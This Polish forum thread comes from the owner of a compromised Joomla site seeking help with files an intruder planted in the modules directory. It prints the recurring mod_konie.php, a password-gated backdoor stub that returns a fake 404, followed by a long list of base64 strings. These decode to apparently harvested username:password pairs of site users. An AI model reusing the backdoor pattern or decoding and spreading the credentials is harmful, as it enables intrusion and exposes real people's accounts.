Czy sprawdziłeś listę zainstalowanych komponentów? Usunąłeś dziurawe, wymagające register globals=ON? Na podstawie opisu pozostaje jedynie zgadywanka, co może być przyczyną. Równie dobrze: niewykryty wirus (wszystkie pliki zniszczone).
Poza tym należałoby wymienić dokładnie wszystkie pliki, zarówno Joomla, jak i rozszerzeń - złośliwy kod może siedzieć w którymś z plików, i niekoniecznie to musi być wirus. Przegląd logów serwera powinien dać odpowiedź, w wyniku czego zdarzenie nastąpiło.
Dodatkowe komponenty to:
com_akocomment 2.0 pl
com_docman 1.3.0 RC 2
com_comprofiler 1.0.2 (Community Builder)
com_shoutit 1.4 (shoutbox)
com_top50docman
Oraz dodatkowo 4 komponenty do statystyk, kupione licencje od autora komponentów - są to komponenty wyświetlające zawartość plików Pobieralni, komponent pokazujący pliki dodane przez użytkownika, komponent umożliwiający akceptacje wstawionego pliku przez użytkownika. Czy mozliwe jest, by autor skryptu wstawił w nich jakiś kod umożliwiający mu wejście do Pobieralni, czy na sam serwer?
Jak sprawdzić, czy te zrobione przez kogoś komponenty nie są przyczyną wtargnięć?
Od dostawcy hostingu otrzymałem analizę logów i do nie j wyjaśnienie:
oraz na pytanie o mechanizm tego wgrania:Ktoś łącząc się poprzez serwer proxy - w3cache.icm.edu.pl wgrał Panu plik: /modules/docmann2.php.
> > Następnie uruchomił ten skrypt z odpowiednimi parametrami co spowodowało losowy zapis danych do wszystkich plików w podanym katalogu.
Wprawdzie podano mi szczegółowe logi i zasugerowano zwrócenie się do Policji o ściganie tego jako przestępstwa, ale znając realia, przynajmniej w moim mieście, podejrzewam, ze prokurator nie zechce podjąć dochodzenia w tej sprawie. Swoje przekonanie opieram na rozmowie z innym prokuratorem.Wykorzystano lukę w Joomli, uruchomiono skrypt php w katalogu 'modules'.
Proszę poszukać informacji w Internecie na temat tego typu działań.
O katalogu modules były wstawione 4 obce pliki:
mod_docman2.php
mod_docman2.xml
mod_docmann2.php
mod_konie.php
Pliki te skasowałem.
Jeśli byłaby taka potrzeba, to mogę w tym miejscu przytoczyć ich zawartość.
da czy nie da, zglos to, w sumie nic poza czasem nie tracisz, a moze uda sie zlapac odpowiedzialna za to osobe...
Inteligentni ludzie są często zmuszani do picia, by bezkonfliktowo spędzać czas z idiotami.Ernest Hemingway
Nie jesteś pijany, jeśli możesz leżeć na podłodze, nie trzymając się jej.Dean Martin
Poinformowano mnie, ze przeciętny czas oczekiwania na podjecie czynnosci śledczych ( o ile zdecydują sie je podjąć) wynosi 6 miesięcy. W tym czasie zdążą mnie załatwić zupełnie.
Ostatnia dziwna sprawa jest związana z tym co wcześniej wspominałem, z pojawiającym się niewiadomo ską w katalogo Modules plikiem o nazwie: mod_konie.php. Pierwszy taki plik wyglądał na skrypt php. Oto ego zawartość:
Jest to fragment początkowy tego skryptu. Po skasowaniu pojawia sie regularnie ponownie w tym samym katalogu. Następne jego wersje są krótsze, np:Kod PHP:<?php
/**
* @package Joomla
* @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
* @license <a href=\"http://www.gnu.org/copyleft/gpl.html\" target=\"_blank\">http://www.gnu.org/copyleft/gpl.html</a> GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
if ($_GET['p'] != "jOOml4")
{
header("HTTP/1.0 404 Not Found");
exit;
}
?>
aWN5OmMzNDljMzQ5
aWN5OmMzNDljMzQ5
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
ZG1wOlBvbGFjazE5ODg=
ZG1wOlBvbGFjazE5ODg=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
emlvbWFsMTY6OTAwOTI1
TGVzemVrOmxlc2l1bGVr
c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
QmFzc2lhMjAwMDpzaWFiYTE0
QmFzc2lhMjAwMDpzaWFiYTE0
Og==
QmFzc2lhMjAwMDpzaWFiYTE0
cHJpZXN0ZXIxOTkxOnRydXNpYWsx
aWN5Ok1hbEMuMzQ5
aWN5Ok1hbEMuMzQ5
aWN5Ok1hTEMuMzQ5
aWN5Ok1hbEMuMzQ5
aWN5OmMzNDljMzQ5
aWN5OmMzNDljMzQ5
aWN5OmMzNDljMzQ5
bWFub2xvOldpZHpldw==
amFub2Jva3RvaW5ueTpwcmVsdWRpdW05
a2FyYXAzMDpuZW9kYXI=
ZG1wOlBvbGFjazE5ODg=
a2FyYXAzMDpuZW9kYXI=
ZGFyMzIzMzp0ZW9kb3I=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
QW5keUI6cGllc2VrYWJp
QW5keUI6YW5kYnJh
cm9iZXJ0MTAwMTpwZW50aXVtMg==
cmVzOmt1cnR5bmE=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
Ym9tYmFzdGlrOnFxcXFxcTE=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
d29qdGVrczk6cnViaWtvbjE=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
cHJpZXN0ZXIxOTkxOnRydXNpYWsx
cHJpZXN0ZXIxOTkxOnRydXNpYWsx
cm9iZXJ0MTAwMTpwZW50aXVtMg==
cm9iZXJ0MTAwMTpwZW50aXVtMg==
c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
ZG1wOlBvbGFjazE5ODg=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
ZG1wOlBvbGFjazE5ODg=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YW51bGthOmp1bmlvcjU=
ZGF3aWRmNzc6NzcwNzAx
ZGF3aWRfZjc3Ojc3MDcwMQ==
emlvbWFsMTY6OTAwOTI1
TGVzemVrOmxlc2l1bGVr
QmFzc2lhMjAwMDpzaWFiYTE0
a2xpbWF0eTo1NTU1NTU=
a2FyYXAzMDpiZW9zYXI=
a2FyYXAzMDpuZW9kYXI=
aWN5OmMzNDljMzQ5
bW9uaWFza2E6b3NuYXB1cw==
bWFub2xvOldpZHpldw==
a2FyYXAzMDpuZW9kYXI=
emlvbWFsMTY6OTAwOTI1
a2xpbWF0eTo1NTU1NTU=
cm9iZXJ0MTAwMTpwZW50aXVtMg==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YXJ0dXJtdXp5a2FudDphcnR1cmVrNzk=
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
bW9uaWFza2E6b3NuYXB1cw==
c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
cm9iZXJ0MTAwMTpwZW50b2l1bTI=
cm9iZXJ0MTAwMTpwZW50aXVtMg==
cm9iZXJ0MTAwMTpwZW50aXVtMg==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
c29zbmEubm93YXRvcjI2OmVudGVydGFpbm1lbnQzMw==
Ym9tYmFzdGlrOnFxcXFxcTE=
c2trMTE6Y2ljaWExMQ==
c2trMTE6Y2ljaWExMQ==
c2trMTE6Y2ljaWExMQ==
c2trMTE6Y2ljaWExMQ==
c2trMTE6Y2ljaWE=
c2trMTE6Y2ljaWExMQ==
TGVzemVrOmxlc2l1bGVr
c2trMTE6Y2ljaWExMQ==
c2trMTE6Y2ljaWExMQ==
ZXdjaWFhbW9yZWs6bXV6eWN6a2E=
ZXdjaWFhbW9yZWs6bXV6eWN6a2Ex
amFub2Jva3RvaW5ueTpwcmVsdWRpdW05
a2FyYXAzMDpuZW9kYXI=
a2FyYXAzMDpuZW9kYXI=
YmFydGluaWVtOmJhcnRvc3o=
Skąd sie to bierze i jak z tym walczyć?Kod PHP:YWxleDp6YXBvbW5pYW5lX29kenlza2FuZQ==
wydaje mi sie ze to sa te losowe ciagi znakow o ktorych pisze admin. ciezko Ci cos poradzić tak w ciemno Jeszcze tak myśle czy nie poprosić admina aby włączył safe_mode i zobaczyć czy to nie pomoże. Joomla 1.0.12 ma w chwili obecnej dwie luki bezpieczeństwa stwierdzone, ale wydaje mi sie iz aby je wykorzystac to trzeba sie jednak troche nakombinowac. A jeszcze jak masz ustawione register globals na serwerze?
Z moich informacji wynika, że register globals jest OFF, safe mode też OFF. Wiem to z wstawionego skryptu infophp.php o treści:
Z niego mam dostęp do ustawień serwera.Kod PHP:<?php
phpinfo()
?>
Próbowałem usuwać ten plik mod_konie.php, ale stale powraca, wiec zmieniłem jego treść na inny, niestosowany przeze mnie moduł i zmieniłem chmod do pliku na 644. Nie pomogło, dopisano dodatkową ścieżkę z podobnym ciągiem znaków. Zmieniłem ponownie zawartość pliku i chmod na 444, dalej tak samo. Teraz ustawiłem chmod na 400 i czekam co będzie dalej. Przypomina to zabawę w kotka i myszke, ale nie mam innego pomysłu. Gdybym znał jakiś sposób aby powodować automatyczne kasowanie zawartości tego pliku, to może byłoby to jakieś doraźne załatwienie problemu, ale tu chodzi o przyczyny.
Podejrzewałem,że może mam jakiegoś trojana w komputerze, ale przeskanowałem wszystkimi dostępnymi programami i nic nie znalazłem. Użyłem programu wwdc do zablokowania portów, stosuję Kaspersky Internet Securitu (legalnie zakupiony). Do Panelu Administracyjnego mają oprócz mnie dostęp jeszcze dwie osoby, moi administratorzy. Czy istnieje prawdopodobieństwo, że na komputerze któregoś z nich jest jakiś trojan, generujący ten wpis w katalogu modules?
A czy prosiłeś adminów o zmianę hasła? Możliwe że po przez ich konto ktoś ma dostęp do ustawień Joomli
Swoje hasła do www, do CPanelu zmieniam sam regularnie. Moi dwaj admini mają dostęp do Panelu Administracyjnego na hasło to samo co do strony głównej, ale dodatkowo muszą wpisywać hasła jakie mają w zwiaąku z zastosowaniem htpaswd i htaccess jako zabezpieczenie katalogu administrator. Nie mają dostępu do serwera przez ftp, bo nie zrobiłem im kont ftp.
Witam
Odnośnie bezpieczeństwa - zainteresowani mogą rozpakować sobie pliki z załącznika który dodałem, - wrzucamy oba pliki do głównego katalogu swojego serwisu (tam gdzie masz np. configuration.php) i odpal diagnostics.php dla przykładu u mnie - roztocze.info/diagnostics.php ... Plik ten znaleziony na forum joomla.org da ogólny obraz "plików" w joomla pokaże, któremu brakuje np. VALID MOS ...
pozdrawiam
Krzysiek
Reguły pisania
Cytuj